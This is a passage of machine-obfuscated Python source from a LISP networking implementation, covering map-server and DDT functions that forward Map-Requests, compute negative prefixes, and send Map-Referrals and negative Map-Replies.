lisp_process_pubsub ( lisp_sockets , packet , ooIiIII1 , iiII1 ,
mr_sport , o0Oo0o , O0O00O , oOOOOOo0OO0o0oOO0 )
else :
lisp_send_map_reply ( lisp_sockets , packet , iiII1 , mr_sport )
if 58 - 58: OOooOOo * I11i . I1IiiI
if 46 - 46: I11i + II111iiii * iII111i % ooOoO0o - I1IiiI
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 73 - 73: I1ii11iIi11i * iIii1I11I1II1 . I1Ii111 - Ii1I
if 11 - 11: I11i
if 48 - 48: IiII / O0
if 46 - 46: ooOoO0o + oO0o
if 7 - 7: ooOoO0o * oO0o . i1IIi
I1111i = len ( i1iI11i . registered_rlocs )
if ( I1111i == 0 ) :
lprint ( ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" ) . format ( green ( i1iiii , False ) , IIiii ,
# IiII * OoO0O00 / OoooooooOO % o0oOOo0O0Ooo + OoO0O00
green ( o0oo0OO0oO , False ) ) )
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 25 - 25: IiII % OOooOOo + Ii1I * I1ii11iIi11i
if 25 - 25: iIii1I11I1II1 * OoOoOO00 % I1IiiI + IiII
if 34 - 34: ooOoO0o - OoooooooOO . o0oOOo0O0Ooo
if 83 - 83: II111iiii . OOooOOo
if 88 - 88: O0
I1111I11iI = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 81 - 81: oO0o * OOooOOo . ooOoO0o + Ii1I + OOooOOo % OoO0O00
II1Iii1iI = map_request . target_eid . hash_address ( I1111I11iI )
II1Iii1iI %= I1111i
IiIi = i1iI11i . registered_rlocs [ II1Iii1iI ]
if 58 - 58: I11i % OoooooooOO
if ( IiIi . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( i1iiii , False ) ,
# o0oOOo0O0Ooo / IiII % IiII % i1IIi / IiII - O0
IIiii , green ( o0oo0OO0oO , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( i1iiii , False ) ,
# Oo0Ooo / o0oOOo0O0Ooo . o0oOOo0O0Ooo . o0oOOo0O0Ooo
red ( IiIi . rloc . print_address ( ) , False ) , IIiii ,
green ( o0oo0OO0oO , False ) ) )
if 93 - 93: i11iIiiIii / IiII
if 35 - 35: I1Ii111 / o0oOOo0O0Ooo
if 44 - 44: IiII % i11iIiiIii
if 99 - 99: ooOoO0o % iIii1I11I1II1 + o0oOOo0O0Ooo % I11i
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , IiIi . rloc , to_etr = True )
if 66 - 66: iIii1I11I1II1
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 74 - 74: OoooooooOO - I1Ii111 - I1IiiI
if 30 - 30: Oo0Ooo / o0oOOo0O0Ooo % o0oOOo0O0Ooo * i1IIi
if 58 - 58: OoooooooOO - OOooOOo - OoOoOO00 / i1IIi * Oo0Ooo / i1IIi
if 86 - 86: OoOoOO00 . I11i
if 97 - 97: Ii1I
if 24 - 24: I1IiiI * i11iIiiIii
if 83 - 83: OoOoOO00 * I1ii11iIi11i
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 64 - 64: II111iiii * i1IIi - ooOoO0o
if 4 - 4: ooOoO0o . OoO0O00 . OoO0O00 % ooOoO0o * Oo0Ooo - I1IiiI
if 8 - 8: I1IiiI - I1Ii111 - OoooooooOO * Oo0Ooo * Ii1I
if 11 - 11: I1IiiI
o0Ooo0Oooo0o = map_request . target_eid
oo0oOooo0O = map_request . target_group
i1iiii = lisp_print_eid_tuple ( o0Ooo0Oooo0o , oo0oOooo0O )
o0Oo0o = map_request . nonce
oOoO0OooO0O = LISP_DDT_ACTION_NULL
if 43 - 43: I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
if 15 - 15: I1IiiI
O00OO = None
if ( lisp_i_am_ms ) :
i1iI11i = lisp_site_eid_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if ( i1iI11i == None ) : return
if 75 - 75: O0 . I1Ii111 . Ii1I % Oo0Ooo - OOooOOo / i11iIiiIii
if ( i1iI11i . registered ) :
oOoO0OooO0O = LISP_DDT_ACTION_MS_ACK
O0O00O = 1440
else :
o0Ooo0Oooo0o , oo0oOooo0O , oOoO0OooO0O = lisp_ms_compute_neg_prefix ( o0Ooo0Oooo0o , oo0oOooo0O )
oOoO0OooO0O = LISP_DDT_ACTION_MS_NOT_REG
O0O00O = 1
if 35 - 35: OoO0O00 . II111iiii + I1Ii111 + Ii1I - O0 + OoOoOO00
else :
O00OO = lisp_ddt_cache_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if ( O00OO == None ) :
oOoO0OooO0O = LISP_DDT_ACTION_NOT_AUTH
O0O00O = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( i1iiii , False ) ) )
if 77 - 77: O0 % Ii1I - I1ii11iIi11i
elif ( O00OO . is_auth_prefix ( ) ) :
if 17 - 17: OoooooooOO - OoooooooOO % I1Ii111 * Ii1I . OoooooooOO
if 51 - 51: iIii1I11I1II1 % IiII * iIii1I11I1II1 - OoO0O00 % I1IiiI + i11iIiiIii
if 33 - 33: I11i
if 99 - 99: I11i
oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE
O0O00O = 15
ooo00O0oo = O00OO . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( ooo00O0oo ,
# ooOoO0o . o0oOOo0O0Ooo - II111iiii
green ( i1iiii , False ) ) )
if 5 - 5: ooOoO0o * OoOoOO00 * II111iiii + I1ii11iIi11i - I11i . Ii1I
if ( oo0oOooo0O . is_null ( ) ) :
o0Ooo0Oooo0o = lisp_ddt_compute_neg_prefix ( o0Ooo0Oooo0o , O00OO ,
lisp_ddt_cache )
else :
oo0oOooo0O = lisp_ddt_compute_neg_prefix ( oo0oOooo0O , O00OO ,
lisp_ddt_cache )
o0Ooo0Oooo0o = lisp_ddt_compute_neg_prefix ( o0Ooo0Oooo0o , O00OO ,
O00OO . source_cache )
if 74 - 74: i1IIi
O00OO = None
else :
ooo00O0oo = O00OO . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( ooo00O0oo , green ( i1iiii , False ) ) )
if 3 - 3: O0 / OOooOOo - iII111i
O0O00O = 1440
if 60 - 60: I1IiiI
if 3 - 3: II111iiii % IiII % I1IiiI - I1IiiI . I1Ii111 - OoOoOO00
if 18 - 18: O0
if 26 - 26: i1IIi - iIii1I11I1II1
if 8 - 8: I1Ii111
if 86 - 86: i1IIi
Oo00oo = lisp_build_map_referral ( o0Ooo0Oooo0o , oo0oOooo0O , O00OO , oOoO0OooO0O , O0O00O , o0Oo0o )
o0Oo0o = map_request . nonce >> 32
if ( map_request . nonce != 0 and o0Oo0o != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , Oo00oo , ecm_source , port )
return
if 26 - 26: o0oOOo0O0Ooo % I1Ii111 / Oo0Ooo
if 68 - 68: II111iiii / Oo0Ooo / Oo0Ooo
if 1 - 1: Oo0Ooo
if 73 - 73: Ii1I * iIii1I11I1II1 / o0oOOo0O0Ooo - o0oOOo0O0Ooo / i1IIi
if 64 - 64: Ii1I * I1ii11iIi11i % II111iiii
if 31 - 31: iIii1I11I1II1 % Oo0Ooo . I1IiiI % ooOoO0o
if 38 - 38: I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
if 10 - 10: OoOoOO00 % I11i
if 46 - 46: i1IIi % IiII
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
iIIII = eid . hash_address ( entry_prefix )
O00OOO = eid . addr_length ( ) * 8
OOOoOo0o0Ooo = 0
if 61 - 61: I1Ii111
if 67 - 67: I1IiiI / IiII / iII111i - I1Ii111 - o0oOOo0O0Ooo
if 75 - 75: OOooOOo . ooOoO0o
if 32 - 32: i1IIi / I11i + iIii1I11I1II1 . OOooOOo
for OOOoOo0o0Ooo in range ( O00OOO ) :
O00O0OOOo = 1 << ( O00OOO - OOOoOo0o0Ooo - 1 )
if ( iIIII & O00O0OOOo ) : break
if 42 - 42: i11iIiiIii . o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * iIii1I11I1II1 * I1IiiI . OoooooooOO + I1ii11iIi11i % iIii1I11I1II1
if ( OOOoOo0o0Ooo > neg_prefix . mask_len ) : neg_prefix . mask_len = OOOoOo0o0Ooo
return
if 78 - 78: OoOoOO00 . oO0o - Oo0Ooo - II111iiii - I1ii11iIi11i * oO0o
if 41 - 41: I11i / ooOoO0o + IiII % OoooooooOO
if 72 - 72: Ii1I
if 22 - 22: o0oOOo0O0Ooo / OoO0O00 + OoOoOO00 + Ii1I . II111iiii * I11i
if 85 - 85: i11iIiiIii / I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
if 87 - 87: IiII
if 92 - 92: OoO0O00 / IiII - ooOoO0o
def lisp_neg_prefix_walk ( entry , parms ) :
o0Ooo0Oooo0o , I11111i1 , Oo00oOO00Ooo = parms
if 72 - 72: oO0o
if ( I11111i1 == None ) :
if ( entry . eid . instance_id != o0Ooo0Oooo0o . instance_id ) :
return ( [ True , parms ] )
if 48 - 48: II111iiii % OoooooooOO * Ii1I + iIii1I11I1II1 . OoO0O00 * Oo0Ooo
if ( entry . eid . afi != o0Ooo0Oooo0o . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( I11111i1 ) == False ) :
return ( [ True , parms ] )
if 50 - 50: ooOoO0o + ooOoO0o + IiII
if 58 - 58: iIii1I11I1II1 % I11i + OoO0O00 / II111iiii % ooOoO0o
if 46 - 46: i11iIiiIii - o0oOOo0O0Ooo / OoOoOO00 - I11i
if 47 - 47: IiII
if 85 - 85: I1IiiI . O0 / oO0o
if 100 - 100: I1IiiI / IiII + OoO0O00 . iII111i
lisp_find_negative_mask_len ( o0Ooo0Oooo0o , entry . eid , Oo00oOO00Ooo )
return ( [ True , parms ] )
if 39 - 39: OoooooooOO * OOooOOo - OoO0O00
if 3 - 3: I11i . i11iIiiIii % Oo0Ooo % II111iiii . I11i
if 88 - 88: iIii1I11I1II1 . OOooOOo % iII111i
if 72 - 72: ooOoO0o + i11iIiiIii / i1IIi
if 64 - 64: OOooOOo - OOooOOo
if 42 - 42: i1IIi / ooOoO0o . I1Ii111 % OoOoOO00
if 67 - 67: i1IIi * i11iIiiIii * I1IiiI
if 23 - 23: Oo0Ooo
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 81 - 81: I1Ii111 % II111iiii - Oo0Ooo / I1IiiI + i11iIiiIii . I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
if 60 - 60: OoO0O00 / oO0o . I1IiiI + OoOoOO00 + I1ii11iIi11i % Ii1I
if ( eid . is_binary ( ) == False ) : return ( eid )
if 70 - 70: i1IIi * II111iiii * I1IiiI
Oo00oOO00Ooo = lisp_address ( eid . afi , "" , 0 , 0 )
Oo00oOO00Ooo . copy_address ( eid )
Oo00oOO00Ooo . mask_len = 0
if 7 - 7: OoooooooOO + II111iiii % o0oOOo0O0Ooo * O0 . OoO0O00 * OoooooooOO
iI1ii111i1i = ddt_entry . print_eid_tuple ( )
I11111i1 = ddt_entry . eid
if 68 - 68: OoO0O00 * I11i
if 52 - 52: II111iiii . OoooooooOO % O0 % II111iiii - I1ii11iIi11i % IiII
if 66 - 66: I1Ii111 % I1ii11iIi11i
if 77 - 77: I11i % iIii1I11I1II1 . iIii1I11I1II1 + oO0o % i11iIiiIii . IiII
if 33 - 33: IiII - OOooOOo / i11iIiiIii * iIii1I11I1II1
eid , I11111i1 , Oo00oOO00Ooo = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , I11111i1 , Oo00oOO00Ooo ) )
if 2 - 2: i11iIiiIii % ooOoO0o
if 56 - 56: IiII % ooOoO0o + I1IiiI % I11i - OOooOOo
if 82 - 82: OoooooooOO . i1IIi . OoO0O00 . OoO0O00
if 31 - 31: iIii1I11I1II1
Oo00oOO00Ooo . mask_address ( Oo00oOO00Ooo . mask_len )
if 64 - 64: ooOoO0o
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# OoO0O00 + OoO0O00
iI1ii111i1i , Oo00oOO00Ooo . print_prefix ( ) ) )
return ( Oo00oOO00Ooo )
if 26 - 26: OOooOOo . I1ii11iIi11i % Oo0Ooo * OoooooooOO
if 46 - 46: iII111i - II111iiii % I11i * iII111i - Oo0Ooo
if 87 - 87: i1IIi
if 8 - 8: Oo0Ooo % Oo0Ooo * IiII % Oo0Ooo % IiII + o0oOOo0O0Ooo
if 10 - 10: ooOoO0o
if 63 - 63: I1Ii111 / Ii1I - iIii1I11I1II1 / i11iIiiIii / IiII + I11i
if 57 - 57: iIii1I11I1II1 % iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
def lisp_ms_compute_neg_prefix ( eid , group ) :
Oo00oOO00Ooo = lisp_address ( eid . afi , "" , 0 , 0 )
Oo00oOO00Ooo . copy_address ( eid )
Oo00oOO00Ooo . mask_len = 0
iii1IIiIIiiIIi1 = lisp_address ( group . afi , "" , 0 , 0 )
iii1IIiIIiiIIi1 . copy_address ( group )
iii1IIiIIiiIIi1 . mask_len = 0
I11111i1 = None
if 52 - 52: I1Ii111 - OOooOOo * OoOoOO00
if 54 - 54: iIii1I11I1II1 * OoO0O00 / Oo0Ooo + OoooooooOO
if 38 - 38: iIii1I11I1II1 + OOooOOo + OoO0O00 . iII111i / i1IIi + II111iiii
if 54 - 54: Ii1I - I1IiiI + iII111i * iII111i
if 78 - 78: I1Ii111
if ( group . is_null ( ) ) :
O00OO = lisp_ddt_cache . lookup_cache ( eid , False )
if ( O00OO == None ) :
Oo00oOO00Ooo . mask_len = Oo00oOO00Ooo . host_mask_len ( )
iii1IIiIIiiIIi1 . mask_len = iii1IIiIIiiIIi1 . host_mask_len ( )
return ( [ Oo00oOO00Ooo , iii1IIiIIiiIIi1 , LISP_DDT_ACTION_NOT_AUTH ] )
if 79 - 79: IiII * IiII . OOooOOo + iIii1I11I1II1 . II111iiii
oOOooOoo0O = lisp_sites_by_eid
if ( O00OO . is_auth_prefix ( ) ) : I11111i1 = O00OO . eid
else :
O00OO = lisp_ddt_cache . lookup_cache ( group , False )
if ( O00OO == None ) :
Oo00oOO00Ooo . mask_len = Oo00oOO00Ooo . host_mask_len ( )
iii1IIiIIiiIIi1 . mask_len = iii1IIiIIiiIIi1 . host_mask_len ( )
return ( [ Oo00oOO00Ooo , iii1IIiIIiiIIi1 , LISP_DDT_ACTION_NOT_AUTH ] )
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if ( O00OO . is_auth_prefix ( ) ) : I11111i1 = O00OO . group
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
group , I11111i1 , iii1IIiIIiiIIi1 = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , I11111i1 , iii1IIiIIiiIIi1 ) )
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
iii1IIiIIiiIIi1 . mask_address ( iii1IIiIIiiIIi1 . mask_len )
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , I11111i1 . print_prefix ( ) if ( I11111i1 != None ) else "'not found'" ,
# OoooooooOO + iII111i . o0oOOo0O0Ooo
# I1Ii111 . I1IiiI / ooOoO0o
# o0oOOo0O0Ooo + I1ii11iIi11i
iii1IIiIIiiIIi1 . print_prefix ( ) ) )
if 40 - 40: iII111i + OoooooooOO * Ii1I % II111iiii % I1IiiI
oOOooOoo0O = O00OO . source_cache
if 69 - 69: I1ii11iIi11i - o0oOOo0O0Ooo + OoO0O00 - IiII + I1ii11iIi11i
if 96 - 96: OoooooooOO % iIii1I11I1II1 + OoooooooOO - I1IiiI * OoO0O00
if 86 - 86: OoOoOO00 % OoO0O00 * oO0o * Ii1I - o0oOOo0O0Ooo
if 77 - 77: I11i + O0 % I1ii11iIi11i / oO0o
if 30 - 30: I1ii11iIi11i * O0 % I1IiiI % OoO0O00
oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE if ( I11111i1 != None ) else LISP_DDT_ACTION_NOT_AUTH
if 23 - 23: O0 * OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1
if 68 - 68: Oo0Ooo % II111iiii % I1Ii111 * IiII
if 68 - 68: I1ii11iIi11i % iII111i - i11iIiiIii % I1ii11iIi11i
if 65 - 65: i11iIiiIii
if 75 - 75: OOooOOo % I1ii11iIi11i
if 40 - 40: I1IiiI / I1IiiI
eid , I11111i1 , Oo00oOO00Ooo = oOOooOoo0O . walk_cache ( lisp_neg_prefix_walk ,
( eid , I11111i1 , Oo00oOO00Ooo ) )
if 26 - 26: i11iIiiIii % OoO0O00 % Ii1I - ooOoO0o
if 2 - 2: II111iiii . o0oOOo0O0Ooo * OoooooooOO + OoooooooOO
if 18 - 18: II111iiii * OOooOOo * OoO0O00 * iIii1I11I1II1 % o0oOOo0O0Ooo / IiII
if 95 - 95: I1ii11iIi11i + I1IiiI . OoooooooOO
Oo00oOO00Ooo . mask_address ( Oo00oOO00Ooo . mask_len )
if 22 - 22: I1Ii111 / I1Ii111 / OOooOOo + OoOoOO00 % I1Ii111 / Ii1I
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# Ii1I
# OoOoOO00 - OOooOOo . I11i . I1ii11iIi11i - II111iiii
I11111i1 . print_prefix ( ) if ( I11111i1 != None ) else "'not found'" , Oo00oOO00Ooo . print_prefix ( ) ) )
if 48 - 48: OOooOOo - o0oOOo0O0Ooo / ooOoO0o
if 42 - 42: I1ii11iIi11i * II111iiii + IiII + oO0o * OOooOOo + OoOoOO00
return ( [ Oo00oOO00Ooo , iii1IIiIIiiIIi1 , oOoO0OooO0O ] )
if 80 - 80: OoOoOO00 % OoooooooOO % Oo0Ooo % OOooOOo + ooOoO0o / O0
if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
if 49 - 49: ooOoO0o . Ii1I
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
if 11 - 11: ooOoO0o / Oo0Ooo + i1IIi / IiII
if 4 - 4: iII111i - Oo0Ooo
if 100 - 100: OOooOOo . i1IIi
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 15 - 15: O0 % Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o * iII111i % O0
o0Ooo0Oooo0o = map_request . target_eid
oo0oOooo0O = map_request . target_group
o0Oo0o = map_request . nonce
if 31 - 31: i1IIi . Ii1I - OoooooooOO * I11i * ooOoO0o % oO0o
if ( action == LISP_DDT_ACTION_MS_ACK ) : O0O00O = 1440
if 61 - 61: I1Ii111 . Ii1I * I1ii11iIi11i
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if 13 - 13: iII111i % i1IIi
iiIII111I111 = lisp_map_referral ( )
iiIII111I111 . record_count = 1
iiIII111I111 . nonce = o0Oo0o
Oo00oo = iiIII111I111 . encode ( )
iiIII111I111 . print_map_referral ( )
if 13 - 13: iII111i / OoooooooOO + Ii1I / iII111i
oO00O0o0Oo = False
if 29 - 29: OOooOOo + ooOoO0o % o0oOOo0O0Ooo
if 18 - 18: I11i + OoO0O00 + OoO0O00 . ooOoO0o
if 37 - 37: i1IIi . IiII + I1IiiI % OoOoOO00
if 3 - 3: i11iIiiIii + Ii1I % IiII - I1Ii111 / Oo0Ooo % iIii1I11I1II1
if 86 - 86: Oo0Ooo + Oo0Ooo * oO0o * I1IiiI
if 95 - 95: IiII - OoO0O00 + OOooOOo
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( o0Ooo0Oooo0o ,
oo0oOooo0O )
O0O00O = 15
if 33 - 33: o0oOOo0O0Ooo . i11iIiiIii . ooOoO0o
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : O0O00O = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : O0O00O = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : O0O00O = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : O0O00O = 0
if 100 - 100: i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / i11iIiiIii + OOooOOo
Ooo0O = False
I1111i = 0
O00OO = lisp_ddt_cache_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if ( O00OO != None ) :
I1111i = len ( O00OO . delegation_set )
Ooo0O = O00OO . is_ms_peer_entry ( )
O00OO . map_referrals_sent += 1
if 69 - 69: iII111i - OoOoOO00 / O0
if 22 - 22: o0oOOo0O0Ooo % OoooooooOO + oO0o + Oo0Ooo
if 34 - 34: iII111i / I11i + i1IIi + I1ii11iIi11i * OoooooooOO * IiII
if 70 - 70: iIii1I11I1II1 / I1IiiI * OoOoOO00 / IiII / II111iiii + I1IiiI
if 33 - 33: oO0o
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oO00O0o0Oo = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
oO00O0o0Oo = ( Ooo0O == False )
if 1 - 1: OoOoOO00 . i11iIiiIii % I1Ii111 + OoooooooOO - Oo0Ooo . I1ii11iIi11i
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
o0o0Ooo0OO00o = lisp_eid_record ( )
o0o0Ooo0OO00o . rloc_count = I1111i
o0o0Ooo0OO00o . authoritative = True
o0o0Ooo0OO00o . action = action
o0o0Ooo0OO00o . ddt_incomplete = oO00O0o0Oo
o0o0Ooo0OO00o . eid = eid_prefix
o0o0Ooo0OO00o . group = group_prefix
o0o0Ooo0OO00o . record_ttl = O0O00O
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
Oo00oo += o0o0Ooo0OO00o . encode ( )
o0o0Ooo0OO00o . print_record ( " " , True )
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
if 85 - 85: iII111i % i11iIiiIii
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
if ( I1111i != 0 ) :
for o0oO0OO0Oo0 in O00OO . delegation_set :
ooOoooO = lisp_rloc_record ( )
ooOoooO . rloc = o0oO0OO0Oo0 . delegate_address
ooOoooO . priority = o0oO0OO0Oo0 . priority
ooOoooO . weight = o0oO0OO0Oo0 . weight
ooOoooO . mpriority = 255
ooOoooO . mweight = 0
ooOoooO . reach_bit = True
Oo00oo += ooOoooO . encode ( )
ooOoooO . print_record ( " " )
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , Oo00oo , ecm_source , port )
return
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
if 15 - 15: Oo0Ooo + oO0o . I11i % OoO0O00
if 13 - 13: I1ii11iIi11i / ooOoO0o * I1Ii111
if 45 - 45: I1ii11iIi11i - I11i
if 60 - 60: OOooOOo - OOooOOo * OoOoOO00 / Ii1I % iII111i % Oo0Ooo
if 75 - 75: iIii1I11I1II1 - IiII - I1Ii111
if 4 - 4: i11iIiiIii % OoooooooOO . i11iIiiIii
if 61 - 61: iIii1I11I1II1 . Oo0Ooo . i1IIi
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 45 - 45: I1Ii111
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# I1Ii111 * I1ii11iIi11i / iII111i
red ( dest . print_address ( ) , False ) ) )
if 78 - 78: ooOoO0o
oOoO0OooO0O = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 73 - 73: OoOoOO00 . OoOoOO00
if 1 - 1: I1ii11iIi11i % o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - ooOoO0o - OoO0O00
if 94 - 94: OoO0O00 . Oo0Ooo / OoO0O00 + I1Ii111
if 48 - 48: I1ii11iIi11i * i1IIi + I1Ii111
if 80 - 80: I1IiiI % I11i
if ( lisp_get_eid_hash ( eid ) != None ) :
oOoO0OooO0O = LISP_SEND_MAP_REQUEST_ACTION
if 64 - 64: OOooOOo + i11iIiiIii + I1IiiI . I11i % I11i - o0oOOo0O0Ooo
if 3 - 3: I1IiiI / i1IIi + II111iiii + Oo0Ooo
Oo00oo = lisp_build_map_reply ( eid , group , [ ] , nonce , oOoO0OooO0O , ttl , None ,
None , False , False )
if 48 - 48: o0oOOo0O0Ooo
if 16 - 16: II111iiii . Ii1I + I1Ii111 % i1IIi / i11iIiiIii + OOooOOo
if 43 - 43: I1IiiI . Oo0Ooo + i1IIi + I11i / OoO0O00
if 66 - 66: i11iIiiIii
if ( pubsub ) :
lisp_process_pubsub ( sockets , Oo00oo , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , Oo00oo , dest , port )
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
return
if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if 83 - 83: i1IIi * i1IIi - II111iiii / OoooooooOO . Ii1I + I1Ii111
if 10 - 10: I11i
if 24 - 24: Ii1I
if 30 - 30: II111iiii / Ii1I - I11i - OoO0O00
if 25 - 25: I11i % i1IIi / I11i * i11iIiiIii
if 71 - 71: IiII % I11i - OoooooooOO + I1IiiI / Oo0Ooo % I11i
def lisp_retransmit_ddt_map_request ( mr ) :
IiIiI11111i1i = mr . mr_source . print_address ( )
o0OOoooO0 = mr . print_eid_tuple ( )
o0Oo0o = mr . nonce
if 37 - 37: I1IiiI . OoO0O00
if 13 - 13: Oo0Ooo - OoooooooOO % Ii1I
if 89 - 89: I11i + I1IiiI - II111iiii
if 4 - 4: I1ii11iIi11i
if 51 - 51: I1Ii111 . O0 - OoOoOO00 + i11iIiiIii * II111iiii
if ( mr . last_request_sent_to ) :
I1oo0oooo00OOO = mr . last_request_sent_to . print_address ( )
O0oO0 = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( O0oO0 and I1oo0oooo00OOO in O0oO0 . referral_set ) :
O0oO0 . referral_set [ I1oo0oooo00OOO ] . no_responses += 1
if 80 - 80: i1IIi
if 74 - 74: I1ii11iIi11i . OoO0O00 + i11iIiiIii
if 19 - 19: i1IIi / I1IiiI + IiII . iII111i
if 68 - 68: iII111i
if 29 - 29: II111iiii / II111iiii % OoO0O00 % Oo0Ooo . II111iiii
if 33 - 33: OoooooooOO . OoO0O00 % OoooooooOO
if 9 - 9: IiII * O0 + OOooOOo . II111iiii
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
